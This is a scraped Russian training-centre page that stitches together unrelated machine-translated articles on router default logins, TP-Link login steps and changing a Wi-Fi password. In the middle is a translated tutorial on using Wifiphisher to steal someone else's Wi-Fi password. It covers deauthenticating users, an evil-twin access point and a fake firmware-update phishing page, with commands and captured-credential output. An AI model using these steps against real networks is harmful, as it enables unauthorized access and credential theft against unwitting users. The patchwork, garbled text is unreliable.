Мы принимаем к оплате:

«Подарочный сертификат» от нашего Учебного Центра – это лучший подарок для тех, кто Вам дорог! Оплате обучение и подарите Вашим родным и близким обучение по любому из курсов!!!

«Сертификат на повторное обучение» дает возможность повторно пройти обучение в нашем Учебном Центре со скидкой 1000 рублей!

А также:


Как узнать имя пользователя вай фай роутера


Как узнать имя пользователя и пароль роутера: ответ специалиста

Всем привет. И у нас на повестке дня очередной вопрос – как узнать имя пользователя и пароль роутера. Вы скорее всего хотите поменять пароль от Wi-Fi или имя беспроводной сети, а быть может сделать перенастройку интернета. Конечно, просто так вас маршрутизатор внутрь Web-интерфейса не пустит и запрашивает какие-то непонятные данные.

Ключ по умолчанию

В первую очередь можно вспомнить, какие данные вы вводили в самом начале, при настройке. Если вы его настраиваете в первый раз или уверены, что стандартные данные не меняли, то можно попробовать несколько вариантов. Первый вариант — это ввести в обе строки слово «admin». Все буквы следует писать с маленькой буквы. В итоге получится: «admin – admin»;

Если данные не подойдут, то попробуйте вторую строчку пароля оставить пустой, а в первую впишите также «admin». Далее можно в качестве ключа попробовать значения: 1234 или 1234567890. Если и это не поможет, то самым простым способом будет посмотреть на этикетку под корпусом вашего интернет-центра.

Как видите тут есть очень много полезной информации и адрес, а также наш логин и ключ от Web-интерфейса. Попробуйте ввести его. Но на некоторых аппаратах эти данные не написаны, поэтому скорее всего логина и пароля изначально не было. Тогда перейдите к следующей главе.

Если этикетка сорвана, то можно узнать логин и пароль для входа в вай-фай роутер другим способом. Для этого есть ресурс – routerpasswords.com. Вбиваем этот адрес в адресную строку браузера. Далее в строке «Select your Router Manufacturer» выбираем наименование маршрутизатора и нажимаем «Find Password». После этого смотрим нужные данные и пробуем их ввести

ПОМОЩЬ! Если вы запутались, то можете просто написать название вашей модели интернет-центра в комментариях ниже, и я напишу логин и ключ, которые в нём по умолчанию.

Логин и ключ по умолчанию не подходит

Если маршрутизатора настраивали не вы, то нужно узнать у этого человека эти данные. Если это ваш друг или знакомый, то следует ему позвонить. Если его настраивали работники провайдера, то можно позвонить туда, обычно они выставляют свои определенные значения и оператор должен их назвать. Иногда в качестве пароля применяют название провайдера: например – rostelekom. Можно попробовать admin и название провайдера транслитом. Также можно попробовать вбить эти названия в обе строки.

Если и это не даст результата, то ключ никак больше не узнаешь. Самым верным способом будет сброс настроек до заводской конфигурации и настройка его повторно. Но расстраиваться не стоит, так как марштутизаторы настраиваются достаточно просто и скоро вы в этом сами убедитесь.

Чтобы сбросить аппарат до заводской конфигурации, нужно найти у него дырочку или кнопку «Reset» (иногда имеет сокращенное название «RST»). Далее нужно её зажать на 10 секунд. После этого роутер начнет мигать, что будет символизировать о перезагрузке системы.

Как только аппарат будет сброшен – на него можно будет зайти по стандартным данным: IP, имя пользователя и ключ. Для настройки у нас на портале есть все известные инструкции по всем моделям роутеров. Просто найдите на странице строку поиска и вбейте туда полное название модели интернет-центра.

Второй вариант — это найти свою модель в соответствующем разделе в верхнем меню «Настройка роутера». В любом другом случае вы всегда можете обратиться к нашим специалистам в комментариях, и мы с радостью вам поможем.

Как изменить настройки маршрутизатора (логин, IP, канал и т. Д.)

Как получить доступ к маршрутизатору

Чтобы поиграть с настройками маршрутизатора, вам нужно узнать, как получить к нему доступ как администратор. Если вы находитесь в той же сети, что и маршрутизатор (т. Е. Вы либо подключены к маршрутизатору с помощью кабеля Ethernet, либо подключены к беспроводной сети, созданной маршрутизатором), вы можете сначала попробовать простой метод:

  1. Откройте ваш любимый веб-браузер.
  2. Один за другим введите следующие IP-адреса в адресную строку: 192.168.0.1, 192.168.1.1, 192.168.2.1, 10.0.1.1, 10.0.0.1, 10.10.1.1.

Если вы видите окно входа или страницу приветствия, вам повезло, и вы можете перейти к следующей главе этой статьи. Если вам не удается получить доступ к маршрутизатору с помощью любого из IP-адресов, перечисленных выше, попробуйте следующий метод:

  1. Щелкните логотип Windows, расположенный в левой части панели задач.
  2. Щелкните значок «Настройки».
  3. Выберите Сеть и Интернет.
  4. Щелкните Просмотр свойств сети.
  5. Прокрутите вниз и найдите «Шлюз по умолчанию».
  6. Число рядом с ним - IP-адрес вашего маршрутизатора.
  7. Введите адрес в адресную строку вашего любимого веб-браузера.
  8. Если вы видите окно входа или страницу приветствия, вы успешно получили доступ к маршрутизатору.

Следующий шаг - войти в систему как администратор. Если вы не меняли пароль администратора маршрутизатора, вполне вероятно, что «admin» будет работать.Если это не так, посмотрите на информационную наклейку на нижней или задней стороне маршрутизатора. Производители маршрутизаторов иногда печатают на нем имя пользователя и пароль по умолчанию.

Если вам по-прежнему не удается получить доступ к маршрутизатору, рекомендуется нажать и удерживать кнопку сброса на его задней панели и повторить попытку. Если даже это не дает вам доступа к интерфейсу администратора вашего маршрутизатора, попробуйте поискать справку в Интернете. Есть много веб-сайтов, таких как этот, на которых перечислены маршрутизаторы и соответствующая информация для входа в систему администратора.

.

Как войти в веб-интерфейс маршрутизаторов Wi-Fi (новый логотип)?

Эта статья относится к:

Archer A6 (V2), Archer A7 (V5), Archer C3150 (V2), Archer C60 (V2 V3), Archer A2300 (V1), Archer C9 (V4 V5), Лучник C6 (V2), Лучник C7 (V4 V5), Лучник C1900 (V2), Лучник C59 (V2 V3), Лучник C58 (V2), Лучник C1200 (V2 V3), Лучник C3150 V2, Лучник A10 (V1), Лучник C2300 (V1 V2), Archer C80 (V1), Archer C3200 (V2)

С помощью веб-утилиты легко настроить маршрутизатор и управлять им.Веб-утилита может использоваться в любой ОС Windows, Macintosh или UNIX с веб-браузером, например Microsoft Internet Explorer, Mozilla Firefox или Apple Safari. Это встроенный внутренний веб-сервер, не требующий доступа в Интернет. Однако для этого требуется, чтобы ваше устройство было подключено к маршрутизатору. Это соединение может быть проводным или беспроводным .

Примечание. Низкая версия вашего веб-браузера может вызвать проблемы совместимости с веб-утилитой (страницей управления) вашего устройства, например невозможность входа в интерфейс, отображение неполных функций и т. Д.

Выполните следующие действия, чтобы войти в свой маршрутизатор.

1. Настройте протокол TCP / IP в режиме автоматического получения IP-адреса на вашем компьютере.

2. Посетите http://tplinkwifi.net и создайте пароль для входа в систему для безопасного управления. Затем нажмите «Приступим к работе», чтобы войти в систему.

Примечание:

Если вы зарегистрировали TP-Link ID и привязали к нему свой облачный маршрутизатор, созданный вами здесь пароль для входа будет недействителен.Войдите в облачный маршрутизатор, используя свой TP-Link ID.

Адрес доступа по умолчанию зависит от модели. Вы найдете его на нижней этикетке продукта.

Если вы забыли пароль, сбросьте настройки маршрутизатора до заводских значений по умолчанию, нажав кнопку / отверстие сброса на маршрутизаторе.

Чтобы узнать больше о каждой функции и конфигурации, перейдите в Центр загрузок , чтобы загрузить руководство для вашего продукта.

.

Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo

В то время как взлом пароля и атаки PIN-кода установки WPS привлекают много внимания, атаки социальной инженерии - безусловно, самый быстрый способ получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не вводят пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.

Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа в систему, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.

Незнание того, насколько надежен пароль, на который вы нападаете, может расстраивать, потому что инвестирование времени и вычислительной мощности, задействованных в атаке по словарю или грубой силе, может сделать бессмысленную атаку огромной тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.

Знает ли средний пользователь, как выглядит страница входа в систему его Wi-Fi роутера? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, все равно будет вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?

Вифифишер считает, что ответ - «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого близнеца, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для обновления прошивки, что объясняется как причина, по которой Wi-Fi перестал работать.

Обновление прошивки из ада

Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.

Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которой может присоединиться любой желающий. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.

После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно отнеслись к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства повторно подключаются к сети, теперь они более безопасны благодаря установленному обновлению.

Easy Access with Bossy Update

Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите нацелить.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что их маршрутизатор работает в каком-то неопределенном режиме обновления.

Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается на соответствие производителю маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.

Что вам понадобится

Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.

Слева направо, начиная сверху: Alfa AWUS036NH; Альфа AWUS051NH; TP-LINK TL-WN722N; Альфа AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Image by Kody / Null Byte

Помимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.

Шаг 1. Установка Wifiphisher

Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.

  ~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте apt autoremove, чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.  

Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:

  ~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install  

Это должно установить Wifiphisher, который с этого момента вы можете начать, просто набрав имя программы в окне терминала.

Шаг 2. Просмотрите флаги Wifiphisher

У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, на странице --help вы можете увидеть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.

  ~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее захваченный с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа меняла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.  

Шаг 3. Подключите адаптер беспроводной сети

Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного монитора, если вы этого не сделаете сами.

Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N - 802.11n - 150 Мбит / с - 2,4 ГГц - 5 дБи Антенна

Шаг 4: Запуск сценария

Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавьте имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.

Чтобы запустить сценарий, я выполню следующую команду.

  ~ # wifiphisher -i wlan1  

После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .

  Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Команда исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ —————————————————————————————————————————————————— ———————————————————————————————————————  

Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.

  Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.В этом шаблоне отображается страница Chrome «Ошибка подключения» и окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с помощью OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которая может использоваться для передачи полезных данных жертвам. 

После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.

  Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:  

После того, как цель присоединится, всплывающее окно потребует ввести пароль.

Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.

  Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html  

Вот и все! Сценарий завершится и представит вам только что введенный пароль.

  [*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Следите за нами: https://twitter.com/wifiphisher [+] Ставьте лайк: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие  

Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застревают за этим ужасным медленным фальшивым экраном загрузки.

Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.

Изображение Kody / Null Byte

Надеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.

Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную хакерскую карьеру с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.

Купить сейчас (90% скидка)>

Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты Kody / Null Byte .

Как изменить пароль Wi-Fi роутера

Профилактика, как говорится, лучше лечения. Вот почему рекомендуется всегда использовать защиту паролем для их широкополосного подключения, чтобы избежать определенных ситуаций.

Мы всегда сохраняем наш пароль Wi-Fi на наших смартфонах, смарт-телевизорах и многих других устройствах, и большинство из них остаются сохраненными в облаке. Поэтому, чтобы контролировать конфиденциальность и безопасность, мы всегда должны время от времени менять пароль Wi-Fi. Теперь, если вам интересно, как изменить или обновить пароль Wi-Fi, просто выполните следующие действия.

Есть несколько вещей, которые пользователь должен знать, прежде чем приступить к выполнению шагов.

• Торговая марка и номер модели маршрутизатора.

• Знайте URL-адрес портала конфигурации маршрутизатора (см. Руководство пользователя).

• Логин и пароль для портала конфигурации (имя пользователя и пароль по умолчанию - «admin»).

• Портативный компьютер или мобильный телефон, подключенный к тому же Wi-Fi-соединению, или кабель LAN для соединения маршрутизатора с портативным компьютером.

Следующие шаги:

1.Откройте браузер на своем смартфоне или ноутбуке.

2. Введите URL-адрес (для маршрутизатора TP-Link 192.168.1.1) портала конфигурации в адресную строку и нажмите Enter.

3. Введите имя пользователя и пароль маршрутизатора для входа в систему.

4. Ищите параметр «Безопасность беспроводной сети», независимо от марки маршрутизатора, который вы используете.

5. После выбора опции «Безопасность беспроводной сети» перейдите к парольной фразе PSK и введите свой пароль.

6. Нажмите кнопку «Сохранить» и перезагрузите маршрутизатор.

Выбор надежного пароля

Простой пароль легко угадать и нажать, а пробный метод может привести к несанкционированному доступу к вашему общему соединению для передачи данных. Однако, следуя приведенным ниже рекомендациям, можно выбрать надежный пароль для своей точки доступа.

• Всегда используйте буквенно-цифровой пароль.



• Избегайте использования легко угадываемых паролей, таких как имя вашего питомца, дата рождения, номер дома, номер велосипеда / автомобиля, номер вашего телефона и т. Д.

• Использование специальных символов немного усложняет пароль.

Вот список из 100 паролей, которых следует избегать.
.

Смотрите также



Компьютерные курсы по направлениям:

Для начинающих


A

Компьютер для начинающих: Word, Excel, Access и другие программы!

Графические пакеты


B

Популярные пакеты Adobe Photoshop, CorelDraw, ArchiCAD, AutoCAD и другие!

WEB + анимация


C

Курсы по созданию сайтов, WEB-дизайну и крутой анимации в Adobe Flash!

Бухгалтерия + делопроизводство

Сетевые технологии


E

Курсы сборки ПК, системных администраторов и защиты информации!